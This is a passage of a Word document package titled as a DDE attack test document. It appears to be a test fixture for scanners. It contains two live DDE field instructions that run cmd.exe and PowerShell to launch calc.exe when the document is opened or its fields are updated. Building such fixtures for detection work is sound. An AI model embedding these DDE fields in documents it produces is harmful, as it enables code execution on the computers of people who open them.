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DDE ATTACK TEST DOCUMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This document contains a DDE field attempting to execute:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" DDEAUTO c:\\windows\\system32\\cmd.exe &quot;/k calc.exe&quot; ">
        <w:r>
          <w:t>DDE Field - Click to Update</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Alternative DDE syntax:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" DDE c:\\windows\\system32\\cmd.exe &quot;/c powershell.exe -Command Start-Process calc.exe&quot; ">
        <w:r>
          <w:t>DDE Command Execution</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
</Relationships>
</file>